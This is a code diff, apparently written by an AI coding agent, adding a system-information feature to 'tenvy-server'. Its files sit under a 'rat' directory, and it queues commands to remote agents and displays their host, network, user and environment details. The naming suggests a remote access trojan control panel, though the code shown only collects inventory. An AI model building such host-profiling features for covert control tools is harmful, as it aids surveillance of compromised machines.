+                                                                <span aria-hidden="true"> · </span>VMS {formatBytes(report.runtime.process.memoryVmsBytes)}
+                                                        </span>
+                                                </p>
+                                        </div>
+                                </CardContent>
+                        </Card>
+
+                        <Card class="border-border/60">
+                                <CardHeader>
+                                        <CardTitle>Environment</CardTitle>
+                                        <CardDescription>Operator context inherited by the agent process.</CardDescription>
+                                </CardHeader>
+                                <CardContent class="space-y-4 text-sm">
+                                        <div class="grid gap-4 sm:grid-cols-2">
+                                                <div>
+                                                        <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Username</p>
+                                                        <p class="mt-1 font-medium text-foreground">
+                                                                {report.environment.username ?? '—'}
+                                                        </p>
+                                                </div>
+                                                <div>
+                                                        <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Home directory</p>
+                                                        <p class="mt-1 font-medium text-foreground">
+                                                                {report.environment.homeDir ?? '—'}
+                                                        </p>
+                                                </div>
+                                                <div>
+                                                        <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Shell</p>
+                                                        <p class="mt-1 font-medium text-foreground">
+                                                                {report.environment.shell ?? '—'}
+                                                        </p>
+                                                </div>
+                                                <div>
+                                                        <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Locale</p>
+                                                        <p class="mt-1 font-medium text-foreground">
+                                                                {report.environment.lang ?? '—'}
+                                                        </p>
+                                                </div>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">PATH entries</p>
+                                                <div class="mt-2 flex flex-wrap gap-1">
+                                                        {#if report.environment.pathEntries && report.environment.pathEntries.length > 0}
+                                                                {#each report.environment.pathEntries as entry}
+                                                                        <Badge variant="outline">{entry}</Badge>
+                                                                {/each}
+                                                        {:else}
+                                                                <span class="text-muted-foreground">—</span>
+                                                        {/if}
+                                                </div>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Environment variables</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {formatNumber(report.environment.environmentCount)} values
+                                                </p>
+                                        </div>
+                                </CardContent>
+                        </Card>
+
+                        <Card class="border-border/60">
+                                <CardHeader>
+                                        <CardTitle>Agent metadata</CardTitle>
+                                        <CardDescription>Agent versioning and identification.</CardDescription>
+                                </CardHeader>
+                                <CardContent class="space-y-4 text-sm">
+                                        <div class="grid gap-4 sm:grid-cols-2">
+                                                <div>
+                                                        <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Agent ID</p>
+                                                        <p class="mt-1 font-medium text-foreground">{report.agent.id ?? client.id}</p>
+                                                </div>
+                                                <div>
+                                                        <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Version</p>
+                                                        <p class="mt-1 font-medium text-foreground">{report.agent.version ?? client.version ?? '—'}</p>
+                                                </div>
+                                                <div>
+                                                        <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Started</p>
+                                                        <p class="mt-1 font-medium text-foreground">
+                                                                {formatTimestampDisplay(report.agent.startTime)}
+                                                        </p>
+                                                </div>
+                                                <div>
+                                                        <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Uptime</p>
+                                                        <p class="mt-1 font-medium text-foreground">
+                                                                {formatDuration(report.agent.uptimeSeconds)}
+                                                        </p>
+                                                </div>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Tags</p>
+                                                <div class="mt-2 flex flex-wrap gap-1">
+                                                        {#if report.agent.tags && report.agent.tags.length > 0}
+                                                                {#each report.agent.tags as tag}
+                                                                        <Badge>{tag}</Badge>
+                                                                {/each}
+                                                        {:else}
+                                                                <span class="text-muted-foreground">—</span>
+                                                        {/if}
+                                                </div>
+                                        </div>
+                                </CardContent>
+                        </Card>
+                </div>
+
+                {#if report.warnings && report.warnings.length > 0}
+                        <Alert class="border-amber-200 bg-amber-50 text-amber-900">
+                                <AlertTriangle class="h-4 w-4" />
+                                <AlertTitle>Agent warnings</AlertTitle>
+                                <AlertDescription>
+                                        <ul class="list-disc space-y-1 pl-4">
+                                                {#each report.warnings as warning}
+                                                        <li>{warning}</li>
+                                                {/each}
+                                        </ul>
+                                </AlertDescription>
+                        </Alert>
+                {/if}
+        {:else}
+                <div class="rounded-lg border border-dashed border-border/60 bg-muted/40 p-6 text-sm text-muted-foreground">
+                        System information has not been collected yet. Use the refresh action to request a snapshot.
+                </div>
+        {/if}
+</div>

--- a/tenvy-server/src/lib/components/system-information-dialog.svelte.spec.ts
+++ b/tenvy-server/src/lib/components/system-information-dialog.svelte.spec.ts
@@ -1,0 +1,231 @@
+import { page } from '@vitest/browser/context';
+import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest';
+import { render } from 'vitest-browser-svelte';
+
+import type { Client } from '$lib/data/clients';
+import type { SystemInfoSnapshot } from '$lib/types/system-info';
+
+import SystemInformationDialog from './system-information-dialog.svelte';
+
+const originalFetch = globalThis.fetch;
+
+const baseClient: Client = {
+        id: 'agent-123',
+        codename: 'FOXTROT',
+        hostname: 'workstation-1',
+        ip: '192.168.1.10',
+        location: 'Test Lab',
+        os: 'Linux',
+        platform: 'linux',
+        version: '2.3.4',
+        status: 'online',
+        lastSeen: new Date().toISOString(),
+        tags: [],
+        risk: 'Medium'
+};
+
+function createSnapshot(): SystemInfoSnapshot {
+        const now = new Date().toISOString();
+        return {
+                agentId: baseClient.id,
+                requestId: 'cmd-1',
+                receivedAt: now,
+                report: {
+                        collectedAt: now,
+                        host: {
+                                hostname: 'workstation-1',
+                                domain: 'corp.example',
+                                ipAddress: '10.0.0.5',
+                                timezone: 'UTC+00',
+                                bootTime: now,
+                                uptimeSeconds: 86_400
+                        },
+                        os: {
+                                platform: 'linux',
+                                family: 'ubuntu',
+                                version: '22.04',
+                                kernelVersion: '6.8.0-tenvy',
+                                kernelArch: 'x86_64',
+                                procs: 256,
+                                virtualization: 'kvm'
+                        },
+                        hardware: {
+                                architecture: 'amd64',
+                                virtualizationRole: 'guest',
+                                virtualizationSystem: 'kvm',
+                                physicalCores: 4,
+                                logicalCores: 8,
+                                cpus: [
+                                        {
+                                                id: 0,
+                                                vendor: 'GenuineIntel',
+                                                model: 'i7-9700',
+                                                cores: 4,
+                                                mhz: 3600,
+                                                cacheSizeKb: 12_288
+                                        }
+                                ]
+                        },
+                        memory: {
+                                totalBytes: 16_000_000_000,
+                                availableBytes: 8_000_000_000,
+                                usedBytes: 8_000_000_000,
+                                usedPercent: 50,
+                                swapTotalBytes: 2_000_000_000,
+                                swapUsedBytes: 500_000_000,
+                                swapUsedPercent: 25
+                        },
+                        storage: [
+                                {
+                                        device: '/dev/sda1',
+                                        mountpoint: '/',
+                                        filesystem: 'ext4',
+                                        totalBytes: 500_000_000_000,
+                                        usedBytes: 200_000_000_000,
+                                        usedPercent: 40,
+                                        readOnly: false
+                                }
+                        ],
+                        network: [
+                                {
+                                        name: 'eth0',
+                                        mtu: 1500,
+                                        macAddress: 'aa:bb:cc:dd:ee:ff',
+                                        addresses: [
+                                                { address: '10.0.0.5', family: 'ipv4' },
+                                                { address: 'fe80::1', family: 'ipv6' }
+                                        ],
+                                        flags: ['up', 'broadcast']
+                                }
+                        ],
+                        runtime: {
+                                goVersion: 'go1.22.5',
+                                goOs: 'linux',
+                                goArch: 'amd64',
+                                logicalCpus: 8,
+                                goMaxProcs: 8,
+                                goroutines: 64,
+                                process: {
+                                        pid: 4321,
+                                        commandLine: '/opt/tenvy/agent',
+                                        workingDirectory: '/opt/tenvy',
+                                        createTime: now,
+                                        cpuPercent: 1.5,
+                                        memoryRssBytes: 120_000_000,
+                                        memoryVmsBytes: 400_000_000
+                                }
+                        },
+                        environment: {
+                                username: 'agent',
+                                homeDir: '/home/agent',
+                                shell: '/bin/bash',
+                                lang: 'en_US.UTF-8',
+                                pathSeparator: '/',
+                                pathEntries: ['/usr/local/bin', '/usr/bin'],
+                                tempDir: '/tmp',
+                                environmentCount: 48
+                        },
+                        agent: {
+                                id: baseClient.id,
+                                version: baseClient.version,
+                                startTime: now,
+                                uptimeSeconds: 7200,
+                                tags: ['tier-1']
+                        },
+                        warnings: ['Disk usage metrics were approximated.']
+                }
+        };
+}
+
+describe('system-information-dialog', () => {
+        beforeEach(() => {
+                globalThis.fetch = vi.fn();
+        });
+
+        afterEach(() => {
+                if (originalFetch) {
+                        globalThis.fetch = originalFetch;
+                } else {
+                        // @ts-expect-error clean up test override
+                        delete globalThis.fetch;
+                }
+        });
+
+        it('renders host, hardware, and runtime details from the snapshot', async () => {
+                const snapshot = createSnapshot();
+                const fetchMock = globalThis.fetch as unknown as ReturnType<typeof vi.fn>;
+                fetchMock.mockResolvedValue(
+                        Promise.resolve({
+                                ok: true,
+                                status: 200,
+                                json: vi.fn().mockResolvedValue(snapshot)
+                        } as unknown as Response)
+                );
+
+                render(SystemInformationDialog, { props: { client: baseClient } });
+
+                await new Promise((resolve) => setTimeout(resolve, 0));
+
+                expect(fetchMock).toHaveBeenCalledWith(`/api/agents/${baseClient.id}/system-info`);
+
+                await expect.element(page.getByText('Host overview')).toBeInTheDocument();
+                await expect.element(page.getByText('corp.example')).toBeInTheDocument();
+                await expect.element(page.getByText('linux')).toBeInTheDocument();
+                await expect.element(page.getByText('go1.22.5')).toBeInTheDocument();
+                await expect
+                        .element(page.getByText('Disk usage metrics were approximated.'))
+                        .toBeInTheDocument();
+        });
+
+        it('surfaces errors returned by the system information endpoint', async () => {
+                const fetchMock = globalThis.fetch as unknown as ReturnType<typeof vi.fn>;
+                fetchMock.mockResolvedValue(
+                        Promise.resolve({
+                                ok: false,
+                                status: 504,
+                                text: vi.fn().mockResolvedValue('Timed out waiting for agent response')
+                        } as unknown as Response)
+                );
+
+                render(SystemInformationDialog, { props: { client: baseClient } });
+
+                await new Promise((resolve) => setTimeout(resolve, 0));
+
+                await expect
+                        .element(page.getByText('Unable to load system information'))
+                        .toBeInTheDocument();
+                await expect
+                        .element(page.getByText('Timed out waiting for agent response'))
+                        .toBeInTheDocument();
+        });
+
+        it('requests a refreshed snapshot when the refresh action is triggered', async () => {
+                const snapshot = createSnapshot();
+                const fetchMock = globalThis.fetch as unknown as ReturnType<typeof vi.fn>;
+                fetchMock
+                        .mockResolvedValueOnce(
+                                Promise.resolve({
+                                        ok: true,
+                                        status: 200,
+                                        json: vi.fn().mockResolvedValue(snapshot)
+                                } as unknown as Response)
+                        .mockResolvedValueOnce(
+                                Promise.resolve({
+                                        ok: true,
+                                        status: 200,
+                                        json: vi.fn().mockResolvedValue(snapshot)
+                                } as unknown as Response)
+                        );
+
+                render(SystemInformationDialog, { props: { client: baseClient } });
+
+                await new Promise((resolve) => setTimeout(resolve, 0));
+
+                const refreshButton = page.getByRole('button', { name: 'Refresh snapshot' });
+                refreshButton.click();
+
+                await new Promise((resolve) => setTimeout(resolve, 0));
+
+                expect(fetchMock).toHaveBeenNthCalledWith(2, `/api/agents/${baseClient.id}/system-info?refresh=true`);
+        });
+});

--- a/tenvy-server/src/lib/server/rat/system-info.test.ts
+++ b/tenvy-server/src/lib/server/rat/system-info.test.ts
@@ -1,0 +1,200 @@
+import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest';
+import type { SystemInfoReport } from '$lib/types/system-info';
+
+const queueCommand = vi.fn();
+const getAgent = vi.fn();
+
+class MockRegistryError extends Error {
+        status: number;
+
+        constructor(message: string, status: number) {
+                super(message);
+                this.status = status;
+        }
+}
+
+vi.mock('./store', () => ({
+        registry: {
+                queueCommand,
+                getAgent
+        },
+        RegistryError: MockRegistryError
+}));
+
+describe('requestSystemInfoSnapshot', () => {
+        const baseReport: SystemInfoReport = {
+                collectedAt: new Date().toISOString(),
+                host: {
+                        hostname: 'test-host',
+                        hostId: 'host-123',
+                        ipAddress: '192.168.1.10'
+                },
+                os: {
+                        platform: 'linux',
+                        version: '6.8.0'
+                },
+                hardware: {
+                        architecture: 'amd64',
+                        logicalCores: 8
+                },
+                memory: {
+                        totalBytes: 16_000_000_000,
+                        usedBytes: 8_000_000_000
+                },
+                storage: [
+                        {
+                                device: '/dev/sda1',
+                                mountpoint: '/',
+                                filesystem: 'ext4',
+                                totalBytes: 500_000_000_000,
+                                usedBytes: 320_000_000_000
+                        }
+                ],
+                network: [
+                        {
+                                name: 'eth0',
+                                mtu: 1500,
+                                macAddress: 'aa:bb:cc:dd:ee:ff',
+                                addresses: [
+                                        { address: '192.168.1.10', family: 'ipv4' },
+                                        { address: 'fe80::1', family: 'ipv6' }
+                                ]
+                        }
+                ],
+                runtime: {
+                        goVersion: 'go1.22.5',
+                        goOs: 'linux',
+                        goArch: 'amd64',
+                        logicalCpus: 8,
+                        goMaxProcs: 8,
+                        goroutines: 32,
+                        process: {
+                                pid: 1234,
+                                commandLine: '/opt/tenvy/agent',
+                                workingDirectory: '/opt/tenvy',
+                                createTime: new Date().toISOString()
+                        }
+                },
+                environment: {
+                        username: 'agent',
+                        homeDir: '/home/agent',
+                        shell: '/bin/bash',
+                        pathSeparator: '/',
+                        tempDir: '/tmp',
+                        environmentCount: 42
+                },
+                agent: {
+                        id: 'agent-1',
+                        version: '1.2.3',
+                        startTime: new Date().toISOString(),
+                        uptimeSeconds: 3600
+                }
+        };
+
+        const completedAt = new Date().toISOString();
+
+        let module: typeof import('./system-info');
+
+        beforeEach(async () => {
+                queueCommand.mockReset();
+                getAgent.mockReset();
+
+                queueCommand.mockReturnValue({
+                        command: { id: 'cmd-1', name: 'system-info', payload: {}, createdAt: new Date().toISOString() },
+                        delivery: 'queued'
+                });
+
+                getAgent.mockReturnValue({
+                        recentResults: [
+                                {
+                                        commandId: 'cmd-1',
+                                        success: true,
+                                        output: JSON.stringify(baseReport),
+                                        completedAt
+                                }
+                        ]
+                });
+
+                vi.resetModules();
+                module = await import('./system-info');
+        });
+
+        afterEach(() => {
+                vi.resetModules();
+        });
+
+        it('queues a system-info command and returns the parsed snapshot', async () => {
+                const snapshot = await module.requestSystemInfoSnapshot('agent-1');
+
+                expect(queueCommand).toHaveBeenCalledWith(
+                        'agent-1',
+                        { name: 'system-info', payload: {} },
+                        { operatorId: undefined }
+                );
+
+                expect(snapshot.agentId).toBe('agent-1');
+                expect(snapshot.requestId).toBe('cmd-1');
+                expect(snapshot.receivedAt).toBe(completedAt);
+                expect(snapshot.report.hardware.architecture).toBe('amd64');
+                expect(snapshot.report.runtime.goVersion).toBe('go1.22.5');
+        });
+
+        it('passes the refresh flag when requested', async () => {
+                const refreshedSnapshot = await module.requestSystemInfoSnapshot('agent-1', { refresh: true });
+                expect(queueCommand).toHaveBeenCalledWith(
+                        'agent-1',
+                        { name: 'system-info', payload: { refresh: true } },
+                        { operatorId: undefined }
+                );
+                expect(refreshedSnapshot.report.collectedAt).toBe(baseReport.collectedAt);
+        });
+
+        it('throws when the agent reports an error', async () => {
+                getAgent.mockReturnValueOnce({
+                        recentResults: [
+                                {
+                                        commandId: 'cmd-1',
+                                        success: false,
+                                        error: 'module disabled',
+                                        completedAt
+                                }
+                        ]
+                });
+
+                await expect(module.requestSystemInfoSnapshot('agent-1')).rejects.toThrowError(
+                        module.SystemInfoAgentError
+                );
+        });
+
+        it('throws when the payload cannot be parsed', async () => {
+                getAgent.mockReturnValueOnce({
+                        recentResults: [
+                                {
+                                        commandId: 'cmd-1',
+                                        success: true,
+                                        output: '{"collectedAt":1}',
+                                        completedAt
+                                }
+                        ]
+                });
+
+                await expect(module.requestSystemInfoSnapshot('agent-1')).rejects.toThrowError(
+                        module.SystemInfoAgentError
+                );
+        });
+
+        it('re-throws registry errors from queueCommand', async () => {
+                queueCommand.mockReset();
+                queueCommand.mockImplementation(() => {
+                        throw new MockRegistryError('Agent not found', 404);
+                });
+
+                vi.resetModules();
+                module = await import('./system-info');
+
+                await expect(module.requestSystemInfoSnapshot('agent-404')).rejects.toMatchObject({
+                        status: 404,
+                        message: 'Agent not found'
+                });
+        });
+});

--- a/tenvy-server/src/lib/server/rat/system-info.ts
+++ b/tenvy-server/src/lib/server/rat/system-info.ts
@@ -1,0 +1,141 @@
+import type { SystemInfoCommandPayload, SystemInfoReport, SystemInfoSnapshot } from '$lib/types/system-info';
+import { registry, RegistryError } from './store';
+
+const DEFAULT_TIMEOUT_MS = 15_000;
+const MAX_TIMEOUT_MS = 120_000;
+const POLL_INTERVAL_MS = 250;
+
+export class SystemInfoAgentError extends Error {
+        status: number;
+
+        constructor(message: string, status = 500) {
+                super(message);
+                this.name = 'SystemInfoAgentError';
+                this.status = status;
+        }
+}
+
+type CommandResultSnapshot = {
+        commandId: string;
+        success: boolean;
+        output?: string;
+        error?: string;
+        completedAt: string;
+};
+
+function normalizeTimeout(requested?: number): number {
+        if (typeof requested !== 'number' || Number.isNaN(requested) || requested <= 0) {
+                return DEFAULT_TIMEOUT_MS;
+        }
+        const clamped = Math.min(Math.max(Math.floor(requested), POLL_INTERVAL_MS), MAX_TIMEOUT_MS);
+        return Math.max(clamped, DEFAULT_TIMEOUT_MS);
+}
+
+async function waitForCommandResult(
+        agentId: string,
+        commandId: string,
+        timeoutMs: number
+): Promise<CommandResultSnapshot> {
+        const started = Date.now();
+        let delay = POLL_INTERVAL_MS;
+
+        while (Date.now() - started <= timeoutMs) {
+                let snapshot: ReturnType<typeof registry.getAgent>;
+                try {
+                        snapshot = registry.getAgent(agentId);
+                } catch (err) {
+                        if (err instanceof RegistryError) {
+                                throw new SystemInfoAgentError(err.message, err.status);
+                        }
+                        throw err;
+                }
+
+                const match = snapshot.recentResults.find((result) => result.commandId === commandId);
+                if (match) {
+                        return match satisfies CommandResultSnapshot;
+                }
+
+                const elapsed = Date.now() - started;
+                const remaining = timeoutMs - elapsed;
+                if (remaining <= 0) {
+                        break;
+                }
+
+                await new Promise((resolve) => setTimeout(resolve, Math.min(delay, remaining)));
+                delay = Math.min(delay * 2, 1_000);
+        }
+
+        throw new SystemInfoAgentError('Timed out waiting for agent response', 504);
+}
+
+function createPayload(refresh?: boolean): SystemInfoCommandPayload {
+        if (refresh) {
+                return { refresh: true } satisfies SystemInfoCommandPayload;
+        }
+        return {} satisfies SystemInfoCommandPayload;
+}
+
+function decodeReport(raw: string): SystemInfoReport {
+        try {
+                const decoded = JSON.parse(raw) as SystemInfoReport;
+                if (!decoded || typeof decoded !== 'object') {
+                        throw new Error('missing system info payload');
+                }
+                if (typeof decoded.collectedAt !== 'string' || !decoded.collectedAt) {
+                        throw new Error('missing collectedAt timestamp');
+                }
+                if (!decoded.hardware || typeof decoded.hardware.architecture !== 'string') {
+                        throw new Error('missing hardware architecture');
+                }
+                if (!decoded.runtime || typeof decoded.runtime.goVersion !== 'string') {
+                        throw new Error('missing runtime metadata');
+                }
+                return decoded;
+        } catch (error) {
+                const message = error instanceof Error ? error.message : 'invalid payload';
+                throw new SystemInfoAgentError(`Agent response payload malformed: ${message}`, 502);
+        }
+}
+
+export async function requestSystemInfoSnapshot(
+        agentId: string,
+        options: { refresh?: boolean; timeoutMs?: number; operatorId?: string } = {}
+): Promise<SystemInfoSnapshot> {
+        let commandId: string;
+        try {
+                const payload = createPayload(options.refresh);
+                const queued = registry.queueCommand(
+                        agentId,
+                        { name: 'system-info', payload },
+                        { operatorId: options.operatorId }
+                );
+                commandId = queued.command.id;
+        } catch (err) {
+                if (err instanceof RegistryError) {
+                        throw new SystemInfoAgentError(err.message, err.status);
+                }
+                throw new SystemInfoAgentError('Failed to queue system info command');
+        }
+
+        const timeout = normalizeTimeout(options.timeoutMs);
+
+        const result = await waitForCommandResult(agentId, commandId, timeout);
+        if (!result.success) {
+                throw new SystemInfoAgentError(
+                        result.error || 'Agent failed to execute system info command',
+                        502
+                );
+        }
+        if (!result.output) {
+                throw new SystemInfoAgentError('Agent response missing system info payload', 502);
+        }
+
+        const report = decodeReport(result.output);
+
+        return {
+                agentId,
+                requestId: commandId,
+                receivedAt: result.completedAt,
+                report,
+        } satisfies SystemInfoSnapshot;
+}

--- a/tenvy-server/src/lib/types/system-info.ts
+++ b/tenvy-server/src/lib/types/system-info.ts
@@ -1,0 +1,17 @@
+export type {
+        SystemInfoAgent,
+        SystemInfoCommandPayload,
+        SystemInfoCPU,
+        SystemInfoEnvironment,
+        SystemInfoHardware,
+        SystemInfoHost,
+        SystemInfoMemory,
+        SystemInfoNetworkAddress,
+        SystemInfoNetworkInterface,
+        SystemInfoOS,
+        SystemInfoProcess,
+        SystemInfoReport,
+        SystemInfoRuntime,
+        SystemInfoSnapshot,
+        SystemInfoStorage,
+} from '../../../../shared/types/system-info';

--- a/tenvy-server/src/routes/api/agents/[clientId]/system-info/+server.ts
+++ b/tenvy-server/src/routes/api/agents/[clientId]/system-info/+server.ts
@@ -1,0 +1,45 @@
+import { json, error } from '@sveltejs/kit';
+import type { RequestHandler } from './$types';
+import { requireViewer } from '$lib/server/authorization';
+import { requestSystemInfoSnapshot, SystemInfoAgentError } from '$lib/server/rat/system-info';
+
+function parseBoolean(value: string | null): boolean {
+        if (!value) {
+                return false;
+        }
+        const normalized = value.trim().toLowerCase();
+        return normalized === 'true' || normalized === '1' || normalized === 'yes';
+}
+
+function parseTimeout(value: string | null): number | undefined {
+        if (!value) {
+                return undefined;
+        }
+        const parsed = Number(value);
+        if (!Number.isFinite(parsed) || parsed <= 0) {
+                return undefined;
+        }
+        return parsed;
+}
+
+export const GET: RequestHandler = async ({ params, url, locals }) => {
+        const clientId = params.clientId;
+        if (!clientId) {
+                throw error(400, 'Missing agent identifier');
+        }
+
+        requireViewer(locals.user);
+
+        const refresh = parseBoolean(url.searchParams.get('refresh'));
+        const timeoutMs = parseTimeout(url.searchParams.get('timeoutMs'));
+
+        try {
+                const snapshot = await requestSystemInfoSnapshot(clientId, { refresh, timeoutMs });
+                return json(snapshot);
+        } catch (err) {
+                if (err instanceof SystemInfoAgentError) {
+                        throw error(err.status, err.message);
+                }
+                throw error(500, 'Failed to retrieve system information snapshot');
+        }
+};


### PR DESCRIPTION
## Summary
- add a shared system information schema and message envelope
- implement the server orchestration layer and API endpoint for system snapshots
- build a dedicated system information dialog with loading/error states and tests

## Testing
- npm run test:unit -- --run src/lib/server/rat/system-info.test.ts

------
https://chatgpt.com/codex/tasks/task_e_68f9f230daec832ba65157f0ea804442